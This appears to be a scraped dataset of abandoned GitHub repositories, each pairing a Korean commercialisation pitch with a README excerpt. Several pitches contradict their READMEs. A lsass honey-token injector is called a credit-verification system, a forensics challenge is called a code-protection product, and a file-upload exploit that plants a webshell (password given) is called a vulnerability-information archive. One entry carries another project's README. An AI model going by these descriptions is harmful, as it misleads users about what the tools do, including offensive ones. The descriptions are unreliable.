Singapore.\n\nThis is build upon the [FOSDEM Companion For android](https://github.com/cbeyls/fosdem-companion-android). It uses loaders and fragments extensively and is backward compatible up to Android 2.1 thanks to the support library.\n\nTo get more information and install the app, look at the [Google Play Store](https://play.google.com/store/apps/details?id=be.digitalia.fosdem) page.\n\n## How to build\n\nAll dependencies are defined in ```app/build.gradle```. Import the project in Android Studio or use Gradle in command line:\n\n```\n./gradlew assembleRelease\n```\n\nThe result apk file will be placed in ```app/build/outputs/apk/```.   \n\n####Build status\n[![Build Status](https://travis-ci.org/fossasia/ots15-companion.svg?branch=master)](https://travis-ci.org/fossasia/ots15-companion) \n\n## Pending Task\n* Download schedule in ","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"fossasia/sciencehack-artwork","github_url":"https://github.com/fossasia/sciencehack-artwork","stars":12,"language":"PostScript","license":"Unlicense","abandonment_months":117,"description":"# ScienceHack 아트워크 분석 보고서\n\n## 왜 보물인가\n과학 교육 및 해킹 문화를 시각적으로 표현하는 일관된 디자인 자산 모음으로, 교육 기관과 커뮤니티에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **과학 교육 플랫폼 SaaS**: 온라인 학습 서비스에서 강의 자료, 배너, 아이콘으로 통합하여 학생 참여도 20-30% 향상\n2.","readme_excerpt":"# sciencehack-artwork\nArtwork for Science Hack Days and Projects\n\n## License\nScience Hack Day Logos: To the extent possible under law, Jeremy Keith has waived all copyright and related or neighboring rights to the Science Hack Day logo.\n","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"NeumimTo/Pl3xMap","github_url":"https://github.com/NeumimTo/Pl3xMap","stars":7,"language":"Java","license":"MIT","abandonment_months":42,"description":"# NeumimTo/Pl3xMap 분석\n\n## 왜 보물인가\n게임 서버의 지도를 웹 브라우저에서 실시간으로 볼 수 있게 만드는 도구로, 게임 관리자들이 플레이어 위치와 서버 상태를 한눈에 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 게임 서버 관리 플랫폼으로 월 구독료를 받고 여러 게임사에 제공\n- **내부 업무 도구**: 게","readme_excerpt":"<div align=\"center\">\nOriginal Pl3xMap plugin has been discotinued, this fork will keep the plugin alive. \n\t\nGet support at G.E.A.R.S https://discord.gg/syhJgJBE4e\n\t\n<img src=\"https://raw.githubusercontent.com/NeumimTo/Pl3xMap/master/plugin/src/main/resources/web/images/og.png\" alt=\"Pl3xMap\">\n\n# Pl3xMap\n\n[![MIT License](https://img.shields.io/github/license/NeumimTo/Pl3xMap?&logo=github)](License)\n[![CodeFactor](https://www.codefactor.io/repository/github/NeumimTo/pl3xmap/badge)](https://www.codefactor.io/repository/github/NeumimTo/pl3xmap)\n\n[![Pl3xMap's Stargazers](https://img.shields.io/github/stars/NeumimTo/Pl3xMap?label=stars&logo=github)](https://github.com/NeumimTo/Pl3xMap/stargazers)\n[![Pl3xMap Forks](https://img.shields.io/github/forks/NeumimTo/Pl3xMap?label=forks&logo=github)](https://github.com/NeumimTo/Pl3xMap/network/members)\n[![Pl3xMap Watchers](https://img.shields.io/github/watchers/NeumimTo/Pl3xMap?label=watchers&logo=github)](https://github.com/NeumimTo/Pl3xMap/watchers)","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"egoist/preader","github_url":"https://github.com/egoist/preader","stars":12,"language":"TypeScript","license":"unknown","abandonment_months":43,"description":"# egoist/preader 상품화 분석\n\n## 왜 보물인가\n웹사이트의 글을 자동으로 깔끔하게 정리하여 읽기 좋게 만들어주는 도구로, 뉴스나 블로그 읽기를 방해하는 광고와 복잡한 레이아웃 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스 구독 서비스**: 신문사나 뉴스 앱이 이 기술을 적용해 사용자에게 광고 없는 깔끔한 기사 읽기 환경 제공\n2","readme_excerpt":"# preader\n\nExtract the main content from a web page.\n\n[Try some article.](https://preader.egoist.dev/?url=https://foreignpolicy.com/2021/05/28/fragile-india-strong-india/)\n\nNote that scrapper code is ported from [miniflux.app](https://miniflux.app/).\n\n## Bookmarklet\n\n```js\njavascript:void function(){window.location=`https://preader.egoist.dev/%3Furl=${window.location.href}`}();\n```\n\nCreate a bookmark in your browser with the above code as the URL for the bookmark. Now when you activate that new bookmark, it will take the current page your on and open it in the prereader site.\n\n## License\n\nMIT.\n","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"loklak/loklak_ruby_api","github_url":"https://github.com/loklak/loklak_ruby_api","stars":12,"language":"Ruby","license":"MIT","abandonment_months":102,"description":"# loklak_ruby_api 보물 지도\n\n## 왜 보물인가\n트위터 같은 소셜 미디어의 데이터를 손쉽게 수집할 수 있는 작은 도구로, 마케팅·여론조사·뉴스 모니터링이 필요한 기업들에게 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소셜 미디어 분석 플랫폼 - 기업 고객에게 트렌드 분석과 브랜드 모니터링 서비스를 월 구독형으로 판매","readme_excerpt":"# Loklak\n\n[![Dependency Status](https://gemnasium.com/badges/github.com/loklak/loklak_ruby_api.svg)](https://gemnasium.com/github.com/loklak/loklak_ruby_api)\n\nRuby wrapper for loklak.org API - [distributed tweet search server](https://github.com/loklak/loklak_server)\n\n## Installation\n\nAdd this line to your application's Gemfile:\n\n```ruby\ngem 'loklak'\n```\n\nAnd then execute:\n```\nbundle\n```\n\nOr install it yourself as:\n```\ngem install loklak\n```\n\n## Usage\n```\nrequire 'loklak'\n```\n### Hello\n```\nLoklak.hello()\n```\n### Status\n```\nLoklak.status()\n```\n## Contact\nSend me a message in Telegram: [@sevazhidkov](https://telegram.me/sevazhidkov).\n\nOr in Twitter: [@sevazhidkov](https://twitter.com/sevazhidkov).\n\nOr E-mail: [zhidkovseva@gmail.com](mailto:zhidkovseva@gmail.com).\n","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"zverok/wikipedia_ql","github_url":"https://github.com/zverok/wikipedia_ql","stars":9,"language":"Python","license":"MIT","abandonment_months":52,"description":"# Wikipedia QL 상용화 분석\n\n## 왜 보물인가\n위키피디아의 방대한 정보를 마치 데이터베이스처럼 쉽게 검색하고 추출할 수 있는 도구로, 누구나 필요한 정보를 빠르게 찾을 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 연구 자동화 SaaS 서비스**\n학생과 연구원들이 논문 작성 시 관련 정보를 자동으로 수집하고 정리해주는 구독 서비스로 ","readme_excerpt":"# WikipediaQL: querying structured data from Wikipedia\n\n**WikipediaQL** is an _experimental query language_ and Python library for querying structured data from Wikipedia. It looks like this:\n\n```\n$ wikipedia_ql --page \"Guardians of the Galaxy (film)\" \\\n    '{\n      page@title as \"title\";\n      section[heading=\"Cast\"] as \"cast\" >> {\n          li >> text:matches(\"^(.+?) as (.+?):\") >> {\n              text-group[group=1] as \"actor\";\n              text-group[group=2] as \"character\"\n          }\n      };\n      section[heading=\"Critical response\"] >> {\n          sentence:contains(\"Rotten Tomatoes\") as \"RT ratings\" >> {\n              text:matches(\"\\d+%\") as \"percent\";\n              text:matches(\"(\\d+) (critic|review)\") >> text-group[group=1] as \"reviews\";\n              text:matches(\"[\\d.]+/10\") as \"overall\"\n          }\n      }\n    }'\n\nRT ratings:\n  overall: 7.8/10\n  percent: 92%\n  reviews: '334'\ncast:\n- actor: Chris Pratt\n  character: Peter Quill / Star-Lord\n- actor: Zoe Saldaña\n  character: ","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"ClockGet/SimpleIOCPServer","github_url":"https://github.com/ClockGet/SimpleIOCPServer","stars":9,"language":"C#","license":"MIT","abandonment_months":100,"description":"# SimpleIOCPServer 상용화 분석\n\n## 왜 보물인가\n많은 사람들이 동시에 접속해도 끊기지 않는 안정적인 서버를 만드는 핵심 기술을 무료로 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **채팅/메시징 서비스**: 수천 명이 동시에 접속하는 실시간 채팅 앱의 백엔드 서버\n2. **게임 서버 솔루션**: 온라인 게임에서 여러 플레이어의 동시 접속을","readme_excerpt":"## AsyncSocket\nA simple asynchronous Client/Server Socket that uses I/O Completion Port for high performance, and implements the Task-based Asynchronous Pattern with Async and Await.\n\n## Reference\n1. [Cowboy](https://github.com/gaochundong/Cowboy \"Cowboy\")\n2. [MSDN](https://msdn.microsoft.com/en-us/library/system.net.sockets.socketasynceventargs.aspx \"MSDN\")\n","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"benkehoe/aws-error-utils","github_url":"https://github.com/benkehoe/aws-error-utils","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":31,"description":"# aws-error-utils 상품화 분석\n\n## 왜 보물인가\nAWS 클라우드 서비스 사용 중 발생하는 복잡한 오류를 간단하게 해석해주는 도구로, 기술팀의 문제 해결 시간을 대폭 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: AWS 기반으로 운영하는 웹서비스 회사들이 고객 지원 센터에 자동으로 오류 메시지를 번역하는 챗봇","readme_excerpt":"# aws-error-utils\n**Making botocore.exceptions.ClientError easier to deal with**\n\nAll AWS service exceptions are raised by `boto3` as a `botocore.exceptions.ClientError`, with the contents of the exception indicating what kind of exception happened.\nThis is not very pythonic, and the contents themselves are rather opaque, most being held in dicts rather than as properties.\nThe functions in this package help dealing with that, to make your code less verbose and require less memorization of `ClientError` contents.\n\n## Installation\n\n[The package is on PyPI](https://pypi.org/project/aws-error-utils/) for pip-installing, but you can also just copy the [`aws_error_utils.py` file](https://raw.githubusercontent.com/benkehoe/aws-error-utils/stable/aws_error_utils/aws_error_utils.py) into your project.\n\naws-error-utils requires Python 3.7 or higher.\n\n## Usage\nIf you've got code like this:\n\n```python\nimport boto3, botocore.exceptions\n\ns3 = boto3.client('s3')\ntry:\n    s3.get_object(Bucket='my-buck","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"mre/prettyprint","github_url":"https://github.com/mre/prettyprint","stars":6,"language":"Rust","license":"Apache-2.0","abandonment_months":39,"description":"# mre/prettyprint 분석\n\n## 왜 보물인가\n데이터를 사람이 읽기 쉽게 예쁘게 표시해주는 도구로, 개발자들이 복잡한 정보를 빠르게 이해할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **로그 분석 SaaS**: 서버 에러 로그를 깔끔하게 정렬해서 보여주는 웹 서비스\n2. **개발 팀 협업 도구**: 회사 개발팀이 버그를 추적할 때 복잡한","readme_excerpt":"# prettyprint \n\n[![Documentation](https://docs.rs/prettyprint/badge.svg)](https://docs.rs/prettyprint/)\n![CI](https://github.com/mre/prettyprint/workflows/CI/badge.svg)\n\nSyntax highlighting library with batteries included.\n\n> :warning: For new projects, you might want to use [`bat`](https://github.com/sharkdp/bat/) instead, \n> which can be used as a [library now](https://github.com/sharkdp/bat/pull/936). \n> `prettyprint` is in maintenance mode, which means it will \n> not see any major updates anymore, but pull requests will still be reviewed and dependencies will \n> be kept up-to-date for the time being. You might want to consider migrating away eventually, though.\n\n## Quick start\n\n![Screenshot](./assets/screenshot.jpg)\n\nThe above output was created with the following code:\n\n```rust\nlet printer = PrettyPrinter::default()\n    .language(\"rust\")\n    .build()?;\n\nprinter.file(\"fixtures/fib.rs\")?;\n```\n\nNote that `prettyprint` is a [builder](https://github.com/rust-unofficial/patterns/blob/ma","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"philippecrowdsec/iptables-nftables-multiroute-firewall","github_url":"https://github.com/philippecrowdsec/iptables-nftables-multiroute-firewall","stars":8,"language":"Shell","license":"unknown","abandonment_months":57,"description":"# philippecrowdsec/iptables-nftables-multiroute-firewall 분석\n\n## 왜 보물인가\n인터넷 보안의 핵심인 방화벽을 더 효율적으로 관리할 수 있는 도구로, 네트워크 관리자들의 반복적인 설정 작업을 자동화해줍니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 인프라 관리 SaaS**: 기업의 여러 서버 방화벽을 중앙에","readme_excerpt":"# Netfilter (nftables & iptables) firewall, with port knocking and multi-routing system\n\nThis repo has the Iptables firewall script I've been using for years,\nconverted in Nftables. Beyond the rulesets that makes it (hopefully)\na decent firewall, I kept both versions as close to one another as\npossible, to give hints & tricks on how to migrate from Iptables to\nNftables.\n\nIt includes the classical protections on input / forward and output\nchains but also has some \"multiroute\" system included. The basic \nprinciple is to have several connexion, say a FDDI, a 4G and a VPN\nfor example and Mangle (modify) the packets to force them to flow\nthrough the proper connexion depending on src/dst ip, src/dst port \nor whatever else you need.\n\nIE: If you want your work computers to use FDDI connexion, your other\ndevices 4G and leverage VPN only for your TV when using Netflix or \ndownloading, this script is made for you.\n\nIt leverages knocked, ip route, ip rules and nftables or iptables \nmangles and als","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"skyzh/linux-kernel-labs","github_url":"https://github.com/skyzh/linux-kernel-labs","stars":15,"language":"C","license":"GPL-2.0","abandonment_months":60,"description":"# skyzh/linux-kernel-labs 분석\n\n## 왜 보물인가\n리눅스 운영체제의 핵심 작동 원리를 배우는 교육 자료로, 컴퓨터 시스템을 깊이 있게 이해하고 싶은 학습자들을 위한 실습 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 대학교나 부트캠프에서 시스템 프로그래밍 강의를 위한 정식 교재로 판매\n2. **기업 기술 교","readme_excerpt":"# Linux Kernel Labs\n\nThis repo illustrates how to write Linux kernel module labs\nsafely and gracefully in a simple and concise way. Contrary\nto most works on CSDN, we seek for simplest and most\nunderstandable way to tackle a problem.\n\n> Simplicity is better than complexity,\n>\n> Conciseness is better then tediousness,\n>\n> Understanding is better than long reports,\n>\n> Experimenting is better than sticking to traditions,\n> \n> And this is what TA doesn't care.\n\n## License\n\nGPL 2.0\n","composite_score":0.5004,"license_safety_tag":"restricted"},{"name":"megabitsenmzq/youtube-dl-ios","github_url":"https://github.com/megabitsenmzq/youtube-dl-ios","stars":17,"language":"Python","license":"unknown","abandonment_months":55,"description":"# youtube-dl-ios 사업성 분석\n\n## 왜 보물인가\n유튜브 영상을 아이폰에서 직접 다운로드할 수 있는 도구로, 인터넷 연결 없이 영상을 보고 싶은 많은 사람들의 니즈를 충족시킵니다.\n\n## 어디에 쓸 수 있나\n1. **동영상 관리 앱 서비스**: 사용자가 구독하는 유튜브 채널의 영상을 자동으로 저장하고 오프라인에서 재생하는 구독형 앱\n2. **기","readme_excerpt":"# youtube-dl-ios (Megabits fork)\n\n> [youtube-dl][youtube-dl] for iOS, with [Pythonista][pythonista]\n\nDownload a video (or its audio track) by copy the URl to Pythonista.\n\nThis script passes the\nURL to youtube-dl to do the actual download. After the download completes, the\nfile is opened in a QuickLook window where it may be saved to camera roll.\n\nThis fork is using [yt-dlp][yt-dlp] for a better experience.\n\n## Install\n\n1. Install Pythonista\n2. In Pythonista, install [StaSH][stash]\n3. In a StaSH console, install yt-dlp:\n\n    ```sh\n    pip install yt-dlp\n    ```\n\n4. and clone this repository (note: `git` is only available if StaSH is run in\n   Python 2):\n\n    ```sh\n    git clone https://github.com/megabitsenmzq/youtube-dl-ios\n    ```\n\n\n## Usage\n\n1. Copy a YouTube URL.\n2. Run the script.\n3. Select a format to download. To save to camera roll, select an AVC format.\n4. Tap on the share button to save the file.\n\n[youtube-dl]: https://rg3.github.io/youtube-dl/\n[yt-dlp]: https://github.com/yt-","composite_score":0.5004,"license_safety_tag":"unknown"},{"name":"fossasia/wp.api.fossasia.net","github_url":"https://github.com/fossasia/wp.api.fossasia.net","stars":11,"language":"","license":"Apache-2.0","abandonment_months":37,"description":"# fossasia/wp.api.fossasia.net 보물 분석\n\n## 왜 보물인가\n오픈소스 커뮤니티인 FOSSASIA의 워드프레스 데이터를 프로그래밍 방식으로 자동 관리할 수 있는 도구로, 수백 개의 커뮤니티 웹사이트를 한 번에 업데이트하는 등 반복 작업을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 다국어 커뮤","readme_excerpt":"# PSLab Test Jig\n\nRepository for the PSLab Test Jig for testing the [Pocket Science Lab](https://pslab.io) open-hardware platform.\n\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n\nThis repository contains the test jig for the PSLab board. The PSLab Test Jigs are used in production to ensure the PSLab works as expected this. PSLab is a tiny pocket science lab that provides an array of equipment for doing science and engineering experiments. It can function like an oscilloscope, waveform generator, frequency counter, programmable voltage and current source and also as a data logger. Our website is a","composite_score":0.5004,"license_safety_tag":"safe"},{"name":"hosom/honeycred","github_url":"https://github.com/hosom/honeycred","stars":6,"language":"Go","license":"unknown","abandonment_months":113,"description":"# hosom/honeycred 분석 보고서\n\n## 왜 보물인가\n신용 정보 관리와 검증을 자동화하는 시스템으로, 금융 회사나 대출 플랫폼에서 고객 신뢰도를 빠르게 확인할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **P2P 대출 플랫폼의 SaaS**: 개인 간 돈 거래 시 대출자의 신용도를 실시간으로 검증하는 구독형 서비스\n2. **금융사 내부 업무 도","readme_excerpt":"honeycred\n----------------------------------\n\nhoneycred is a utility utilized to seamlessly inject and preserve honey tokens into lsass. \n\nUsage\n----------------------------------\n\nBy default, honeycred will inject credentials into memory with the username **contoso.com\\svc_dlp**, the password **foobar9000**, and run a process called **agent.exe**. \n\nIt's recommended that you change this. These values can be modified at compile time by changing the default values. Alternatively, they can be specified with command line arguments using **-u** for user, **-pw** for the password, and **-path** for the path. \n\n\n![alt injected credentials](https://raw.githubusercontent.com/hosom/honeycred/b774641621856db57e1b2e7476e5ba9ef26759d4/media/mimikatz.PNG)\n","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"RoseSecurity/Obfusc8ted","github_url":"https://github.com/RoseSecurity/Obfusc8ted","stars":5,"language":"","license":"unknown","abandonment_months":55,"description":"# RoseSecurity/Obfusc8ted 분석\n\n## 왜 보물인가\n프로그램 코드를 읽기 어렵게 변환하는 기술로, 소프트웨어 개발사들이 자신의 기술 유출을 방지하는 데 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 소프트웨어 개발 회사들이 구독형으로 코드 보호 서비스 제공\n- **내부 업무 도구**: 기업의 ","readme_excerpt":"<img src=\"https://user-images.githubusercontent.com/72598486/143733814-fa1960d3-0366-4061-9912-51bfb91b1abc.png\" width=\"1000\">\n\n\n# Obfusc8ted:\n\nYou and the AppleLabs' Incident Response Team have been notified of a potential breach to a Human Resources' workstation. According to the Human Resources representative, they did not notice any anomalous activity while browsing the web, but the AppleLabs' system information and event management (SIEM) instance alerted on a suspicious domain. Moments later, the host-based intrusion detection system (HIDS) alerted on several malicious programs acting as potential keyloggers. While the AppleLabs' IT and Incident Response Teams struggle to find the answers, can you lend us your digital forensic experience to hunt down this threat actor?\n\n## Starting Point:\n\nPassword = hackthebox\n\n```\ncd ~\nmkdir Obfusc8ted\ncd /Obfusc8ted\ngit clone https://github.com/RoseSecurity/Obfusc8ted\nunzip Obfusc8ted.zip\n```\n\n## Objective:\n\nLearn new techniques to parse obfus","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"RedMadRobot/omega-bank-ios","github_url":"https://github.com/RedMadRobot/omega-bank-ios","stars":6,"language":"Swift","license":"unknown","abandonment_months":59,"description":"# RedMadRobot/omega-bank-ios 분석\n\n## 왜 보물인가\n은행 앱을 만드는 데 필요한 핵심 기능들을 미리 완성해놓은 코드 모음이라, 금융 서비스를 빠르게 출시할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **핀테크 스타트업의 모바일 뱅킹 앱**: 이 코드를 기반으로 새로운 은행 앱을 빠르게 개발\n2. **기존 은행의 내부 도구**: ","readme_excerpt":"# OmegaBank\n\n## Репозиторий:\n```\nhttps://github.com/RedMadRobot/omega-bank-ios\n```\n### Backend endpoint:\n```\nhttps://omegabank.mock-object.redmadserver.com/api/v1/\n```\n### Backend repository:\n```\nhttps://github.com/RedMadRobot/omega-bank-mock\n```\n## Схемы проекта:\n```\nDebug - development схема\nQA - схема для QA\nRelease - release схема\n```\n## Сборка проекта:\n### QA\n```\nbundle exec fastlane ci\n```\nВы можете запустить этот процесс с помощью скрипта `fastlane/ci build commands/qa_build.command`\n\n# Документация\n\n1. [Структура проекта](Documentation/structure.md)\n1. [Разделение на модули/таргеты](Documentation/modules.md)\n1. [Сервис-ориентированная архитектура на уровне бизнес логики](Documentation/architecture.md)\n1. [MVC - как подход с дочерними контроллерами, за что отвечают родительские контроллеры](Documentation/mvc.md)\n1. [Навигация](Documentation/routing.md)","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"BalestraPatrick/FlightUtilities","github_url":"https://github.com/BalestraPatrick/FlightUtilities","stars":7,"language":"Objective-C","license":"MIT","abandonment_months":91,"description":"# FlightUtilities 상용화 분석\n\n## 왜 보물인가\n비행기 표 가격, 항공편 정보 등을 자동으로 수집하고 분석하는 도구로, 여행 비용을 절감하려는 사람들과 기업들에게 실질적인 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n- **여행사 예약 시스템**: 항공편 가격 자동 비교 기능을 탑재한 온라인 여행 예약 웹사이트\n- **기업 출장 관리 도구","readme_excerpt":"# FlightUtilities\n\n![](header.jpg)\n\nA small app that uses the private `FlightUtilities.framework` to show information about any flight given the airline code, flight code and date.\n\nBuilt during [@_inside](https://twitter.com/_inside) workshop about reverse engineering at [The Swift Alps 2018](https://theswiftalps.com). Feel free to install on your device.\n","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"mmoamenn/FloatingShortcutButton_Android","github_url":"https://github.com/mmoamenn/FloatingShortcutButton_Android","stars":6,"language":"Java","license":"MIT","abandonment_months":103,"description":"# FloatingShortcutButton_Android 평가\n\n## 왜 보물인가\n스마트폰 화면에서 어디서나 빠르게 접근할 수 있는 플로팅 버튼을 만드는 기술로, 앱의 사용성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **배달 앱 SaaS**: 주문 조회, 결제, 배송 추적 버튼을 화면 어디서나 접근 가능하게 하는 기능 제공\n2. *","readme_excerpt":"\n# Assertive Touch in Android\n\nAssertive Touch is a library that lets you create a floating button which shows in your app screens. You can drag and drop it anywhere in your application and you can configure it on runtime to navigate through your predefined shortcuts. \n\n**Sample**\n \n ![Floating Shortcut button](https://github.com/mmoamenn/FloatingShortcutButton_Android/blob/master/samples/sample.gif)\n\n**Installing**\n \n Add it in your root build.gradle at the end of repositories:\n \n ```groovy\n \tallprojects {\n \t\trepositories {\n \t\t\t...\n \t\t\tmaven { url 'https://jitpack.io' }\n \t\t}\n \t}\n  ```\n \t\n Step 2. Add the dependency\n \n ```groovy\n \tdependencies {\n \t\tcompile 'com.github.mmoamenn:Assertive-Touch:1.2.0'\n \t}\n ```\n**How to use in your application**\n\nAdd the following few lines in your application class.\n\n```java\npublic class DemoApplication extends Application {\n\n    @Override\n    public void onCreate() {\n        super.onCreate();\n        \n        ATButton.setup(this) ;\n        ATButton.getI","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"bigsizeme/CNVD-2021-49104","github_url":"https://github.com/bigsizeme/CNVD-2021-49104","stars":6,"language":"Python","license":"unknown","abandonment_months":55,"description":"# CNVD-2021-49104 저장소 분석\n\n## 왜 보물인가\n보안 취약점 정보를 수집하고 공개하는 저장소로, 기업의 시스템 보안 위험을 조기에 파악할 수 있는 귀중한 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 모니터링 SaaS**: 기업 IT 담당자가 실시간으로 자사 시스템의 취약점 여부를 확인하는 구독 서비스\n2. **내부 보안 점검 도구*","readme_excerpt":"# CNVD-2021-49104\nCNVD-2021-49104——泛微E-Office文件上传漏洞\n挂马为冰蝎2 密码 pass\n使用方法如图\n\n\n\n![Alt text](https://github.com/bigsizeme/CNVD-2021-49104/blob/main/1.png)\n","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"ClockGet/AsyncMiddleWare","github_url":"https://github.com/ClockGet/AsyncMiddleWare","stars":9,"language":"C#","license":"MIT","abandonment_months":104,"description":"# ClockGet/AsyncMiddleWare 평가 보고서\n\n## 왜 보물인가\n웹 서비스가 여러 작업을 동시에 처리할 때 순서를 자동으로 관리해주는 작은 하지만 핵심적인 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 요청이 몰렸을 때 순차적으로 처리하는 결제 시스템\n- **내부 업무 도구**: 여러 부서에서 동시에 데이터 업로드","readme_excerpt":"# AsyncMiddleWare\n模仿.net core mvc中间件的设计模式（简化版），实现参考了asp.net core的代码[HttpAbstractions](https://github.com/aspnet/HttpAbstractions \"HttpAbstractions\")和nodejs的开源库[koa](https://github.com/koajs/koa \"koa\")\n","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"boostcampwm-2021/web22-boost-world-cup","github_url":"https://github.com/boostcampwm-2021/web22-boost-world-cup","stars":6,"language":"TypeScript","license":"unknown","abandonment_months":54,"description":"# Boost World Cup 저장소 분석\n\n## 왜 보물인가\n대학생들이 만든 월드컵 토너먼트 시뮬레이션 서비스로, 누구나 재미있게 즐길 수 있는 게임형 웹 애플리케이션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스포츠 팬들을 위한 월드컵 예측 게임 플랫폼으로 월 구독료를 받고 운영\n2. **내부 업무 도구**: 회사나 학교에서 팀 ","readme_excerpt":"# 🏆 Boost World Cup 🏆\n\n<img width=\"420\" alt=\"Logo\" src=\"https://user-images.githubusercontent.com/56618964/139171179-d285ff52-0f06-44fb-96c1-44444c5b4761.png\">\n\n## 🌈 Members\n\n|                       김용진(J042)                        |                     위지원(J128)                     |                       정유환(J189)                       |                      최유진(J207)                       |\n| :-------------------------------------------------------: | :--------------------------------------------------: | :------------------------------------------------------: | :-----------------------------------------------------: |\n|       [Yongjin9660](https://github.com/Yongjin9660)       |         [wiizii](https://github.com/wiizii)          |       [giljung456](https://github.com/giljung456)        |        [yujin0719](https://github.com/yujin0719)        |\n| <img src=\"https://github.com/Yongjin9660.png\" width=\"80\"> | <img src=\"https://github.com/wiizii.png\" width=\"80\"> | <img src=\"https://","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"fs7744/Tars.Csharp","github_url":"https://github.com/fs7744/Tars.Csharp","stars":7,"language":"C#","license":"BSD-3-Clause","abandonment_months":94,"description":"# Tars.Csharp 보물 분석\n\n## 왜 보물인가\n마이크로서비스 아키텍처 구축에 필요한 통신 기술을 C# 개발자들이 쉽게 사용할 수 있도록 만든 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 기반 API 관리 플랫폼**: 여러 회사의 서비스를 연결하는 통합 허브 서비스로, 기술팀이 쉽게 새로운 연결을 추가할 수 있도록 지원\n2. ","readme_excerpt":"#  [give up] 所有内容现已在 https://github.com/TarsNET 重新开始\n\n# Tars.Csharp\n\nTars.Csharp 是 https://github.com/Tencent/Tars 的 dotnet 版本\n\n项目基于 netstandard2.0 标准 \n\n（ps:其实理论1.3就够了, 但为了偷懒，所以没有检查所有api在1.3的支持情况）\n\n## PS\n\n目前项目处于刚起步阶段，暂未完善\n\n初期目标如下：\n- [X] Tars rpc server and client simple Demo\n- [X] Tars rpc 协议解析完善 (大致整理了，但未作完整测试，并且代码应该可以进行优化)\n- [X] 方法重载支持 (虽支持，但导致与tars不统一，接下来会统一规范形式)\n- [X] Client 同步 / 异步 / 单向调用 区分处理与server端方法对应处理 \n\n    (实际 Tars 并不支持方法重载，server端只能有唯一的方法，只是client允许定义同一方法的不同调用形式)\n\n    同步 - 普通方法\n\n    异步 - Task / ValueTask 方法  (建议用 Async 方法名后缀标识，内部会处理与Tars统一，不用担心方法名不一致)\n\n    单向 - 任意方法加 TarsOnewayAttribute  (由于使用TAP，所以无法区分 异步与单向， 只能通过Attribute识别)\n\n- [X] ~~Servant 定位路由~~ (实际已支持，至于配置需要结合Tars配置文件才行)\n","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"lvalnegri/workshops-setup_cloud_analytics_machine","github_url":"https://github.com/lvalnegri/workshops-setup_cloud_analytics_machine","stars":5,"language":"SCSS","license":"MIT","abandonment_months":29,"description":"# 클라우드 분석 머신 설정 워크숍 분석\n\n## 왜 보물인가\n복잡한 데이터 분석 환경을 쉽게 구축할 수 있는 실전 가이드로, 기업이 직접 비용 많이 드는 컨설팅 없이도 자체적으로 분석 시스템을 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 데이터 분석 플랫폼**\n- 기업 고객들을 위해 클라우드 기반 분석 대시보드를 제공하는","readme_excerpt":"# How to Setup a Cloud Server for Data Science\n\n**Author**: [Luca Valnegri](https://www.linkedin.com/in/lucavalnegri/) <br/>\n**Last Updated**: 01 November 2021 <br/>\n**Last Addition**: [OSRM Routing Server](#osrm)\n\n<a name=\"index\"/>\n\n---\n  * [Motivations](#motivations)\n  * [Create a Virtual Private Server](#create-a-virtual-private-server)\n    + [Sign up to Digital Ocean](#sign-up-do)\n    + [Login into Digital Ocean](#login-do)\n    + [Secure Digital Ocean Account](#secure-do)\n    + [Create Your First *droplet*](#droplet-without-ssh-key)\n    + [First Connection](#first-connection)\n      - [Windows Users](#without-key-windows)\n      - [Linux and macOS Users](#without-key-linux-macos)\n  * [Customize Your New Server](#customize-your-new-server)\n    + [Upgrade the System](#upgrade-system)\n    + [Adding swap space](#swap)\n    + [Changing localization](#locale)\n    + [Add Admin 